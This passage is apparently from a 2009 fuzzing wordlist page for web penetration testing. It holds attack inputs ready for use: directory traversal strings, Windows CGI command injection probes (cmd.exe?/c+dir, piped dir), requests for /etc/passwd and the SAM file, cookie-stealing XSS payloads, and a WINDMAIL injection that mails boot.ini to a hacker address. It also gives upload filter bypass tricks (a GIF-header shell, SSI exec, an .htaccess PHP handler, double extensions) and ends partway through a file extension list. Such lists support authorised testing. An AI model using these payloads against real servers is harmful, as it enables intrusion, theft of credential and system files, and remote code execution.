.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2009)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2009 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
